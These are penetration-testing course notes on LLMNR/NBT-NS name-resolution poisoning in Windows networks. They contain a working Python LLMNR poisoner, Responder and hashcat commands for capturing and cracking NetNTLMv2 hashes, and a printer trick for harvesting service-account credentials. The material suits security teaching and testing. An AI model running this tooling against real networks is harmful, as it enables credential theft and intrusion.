# Week 8: LLMNR/NBT-NS Poisoning

**Hello Enumeration, My Old Friend** - This lesson will cover post-exploitation enumeration. In other words, we’ve gained access to a single machine in a network, now what are we looking for? The chapter will focus heavily on Active Directory enumeration concepts as that is the likely environment a pentester will encounter in the real world. However, lessons will be provided for non-Active Directory environments as well. Important tools that will be discussed are nbtscan, nslookup, nbtstat, net commands, and more.

**Active Directory Exploitation** - This lesson focuses on the recognition of vulnerabilities and exploitation tactics in an internal Active Directory environment. Attacks that will be introduced include: LLMNR poisoning/hash cracking, SMB hash relaying, pass the hash, token impersonation, kerberoasting, GPP/c-password attacks, and PowerShell attacks. More attacks will likely be added as the lesson is written, but the most common have been provided.

* Wordlist Heath uses: `realuniq`

## LLMNR/NBT-NS Poisoning

* LLMNR (UDP 5355, multicast) and NBT-NS (UDP 137, broadcast) are the fallback name-resolution protocols Windows uses when DNS fails to resolve a name.
* Name resolution is the first step in connecting to a share (e.g. an SMB path such as `\\hackme\share`).
* The authentication, and therefore the hash, normally goes to the intended share or device.
  * When the client can't resolve the name it asks the whole segment instead. Neither protocol authenticates the answer, so a man in the middle can reply "that's me, connect to me", and the client then authenticates to the attacker. What you capture is a NetNTLMv2 challenge-response, not the raw NT hash, so it can't be used for pass-the-hash; it has to be cracked or relayed.

![Victim tries to access //hackme share, but instead looks for //hackm](https://1094113337-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3hoduT4ByoNaznkzhG%2F-MFIRaNGBKBYSik7a9sG%2F-MFIXFVEo1MEtpt_wvAT%2F2020-08-21%2017_19_01-Window.png?alt=media\&token=7a48a9c1-bf07-4d50-94de-ed5fdbe761e7)

* Crack the captured NetNTLMv2 response offline, then use the recovered password around the network and see what sticks.
* Or relay the authentication to another host without ever knowing the password: **NTLM relay**. This only works against targets that don't require SMB signing, and you can't relay back to the host the authentication came from.
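The exchange described above, as an added example that is not part of the original notes and not Responder's own code: an LLMNR query is a DNS-format message multicast to 224.0.0.252:5355, and the poisoner answers any A-record query with its own address. The name `hackm`, transaction ID and attacker IP below are constructed values; `poison_loop` is a lab-only listener and is not run by the self-test at the bottom.

```python
import socket
import struct

# LLMNR (RFC 4795) reuses the DNS wire format over UDP 5355. Queries go to the
# multicast group 224.0.0.252; the answer is unicast back to the querier's port.
LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355
QTYPE_A, QCLASS_IN = 1, 1


def build_llmnr_query(name: str, txid: int) -> bytes:
    """Build the query a Windows client multicasts after DNS fails on `name`."""
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.split(".")) + b"\x00"
    # id, flags (QR=0 -> query), QDCOUNT=1, ANCOUNT, NSCOUNT, ARCOUNT
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + qname + struct.pack(">HH", QTYPE_A, QCLASS_IN)


def parse_llmnr_query(pkt: bytes):
    """Return (txid, name, qtype, raw question section) for a one-question query, else None."""
    if len(pkt) < 12:
        return None
    txid, flags, qdcount, _, _, _ = struct.unpack(">HHHHHH", pkt[:12])
    if flags & 0x8000 or qdcount != 1:   # QR=1 means this is a response, not a query
        return None
    off, labels = 12, []
    while True:
        n = pkt[off]
        off += 1
        if n == 0:
            break
        labels.append(pkt[off:off + n].decode("ascii", "replace"))
        off += n
    qtype, _qclass = struct.unpack(">HH", pkt[off:off + 4])
    return txid, ".".join(labels), qtype, pkt[12:off + 4]


def build_poisoned_response(query: bytes, attacker_ip: str):
    """Answer *any* A query with the attacker's IP. This is the whole poisoning step."""
    parsed = parse_llmnr_query(query)
    if parsed is None or parsed[2] != QTYPE_A:
        return None
    txid, _name, _qtype, question = parsed
    # flags 0x8000: QR=1 (response); echo the question; one answer record
    header = struct.pack(">HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    # NAME = pointer to offset 12 (the question name), TYPE A, CLASS IN, TTL 30s, RDLENGTH 4
    answer = struct.pack(">HHHIH", 0xC00C, QTYPE_A, QCLASS_IN, 30, 4) + socket.inet_aton(attacker_ip)
    return header + question + answer


def answer_ip(response: bytes) -> str:
    """What the victim takes from the response: the address it will now connect (and authenticate) to."""
    return socket.inet_ntoa(response[-4:])   # RDATA is the final 4 bytes of the single answer RR


def poison_loop(attacker_ip: str, iface_ip: str = "0.0.0.0"):
    """Lab-only listener: join the LLMNR group and answer every A query with attacker_ip."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", LLMNR_PORT))
    mreq = socket.inet_aton(LLMNR_GROUP) + socket.inet_aton(iface_ip)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    while True:
        data, src = sock.recvfrom(2048)
        resp = build_poisoned_response(data, attacker_ip)
        if resp is not None:
            sock.sendto(resp, src)   # unicast back to the querier's source port
            print(f"poisoned {parse_llmnr_query(data)[1]} from {src[0]} -> {attacker_ip}")


if __name__ == "__main__":
    # Constructed scenario: a user types \\hackm instead of \\hackme and DNS has no answer.
    q = build_llmnr_query("hackm", txid=0x1234)
    r = build_poisoned_response(q, "10.0.0.99")
    print(parse_llmnr_query(q)[1], "->", answer_ip(r))
```

The poisoned answer on its own yields nothing: the victim still has to connect to the advertised address and be challenged for NTLM authentication, which is why Responder also runs SMB, HTTP, LDAP and other listeners alongside its LLMNR, NBT-NS and mDNS poisoners.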

### Responder

With nothing more than a position on the network and no credentials, turn on Responder before running scans. (Internal technique, not on the OSCP.)

* Scans (nmap, Nessus, etc.) generate traffic, and the more traffic on the network, the better for an attacker: something may misfire and send a hash your way.
  * The best time to run Responder is the start of the day or right after lunch, when users log in and reconnect to shares. You can leave it running all day.
* Responder.py lives in `/usr/share/responder` on Kali (current images also put a `responder` wrapper on the PATH).

```
# Responder needs root: it binds UDP 137/5355 plus the SMB/HTTP/LDAP/... listeners
# that actually issue the NTLM challenge and capture the response.
python Responder.py -I eth0 -rdw   # -I interface; -r/-d answer NetBIOS wredir/domain-suffix queries; -w rogue WPAD proxy
```

The flag meanings changed in newer Responder releases (3.1.x): `-r` is gone and `-d` now enables rogue DHCP answers, which is far noisier. Check `responder -h` before reusing an old command line; `sudo responder -I eth0 -wv` is the usual modern starting point.

![](https://1094113337-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3hoduT4ByoNaznkzhG%2F-MFIRaNGBKBYSik7a9sG%2F-MFIc9A8J_G7mLPjVzwk%2F2020-08-21%2017_45_01-Window.png?alt=media\&token=ac101aaf-97f4-4332-b6e5-fe3c91145325)

* If you find default credentials on anything with a configurable SMB target (e.g. a printer's scan-to-share settings), there is usually a "test connection" button. Point it at your Responder host and the device authenticates to you, handing over the configured account's credentials. Those service accounts often aren't least-privileged, so this can be an instant win.

### Hashcat

```
# Linux -- VMs without GPU passthrough will take much longer
hashcat -m 5600 hash.txt /root/rockyou.txt   # -m 5600 = NetNTLMv2 (use 5500 for NetNTLMv1)
hashcat -m 5600 hash.txt --show              # print user:password pairs from the potfile afterwards

# Windows (hashcat64.exe is the 4.x binary name; newer releases ship hashcat.exe)
..\hashcat-4.2.1>hashcat64.exe -m 5600 hash.txt rockyou.txt
```

## Defenses

![](https://1094113337-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3hoduT4ByoNaznkzhG%2F-MFIf5Y5m7l7U37myWyF%2F-MFIffISQewWZeyLOE4e%2F2020-08-21%2018_00_30-Window.png?alt=media\&token=9bff0fc8-b738-4580-88ff-0a32ec7b7a3d)
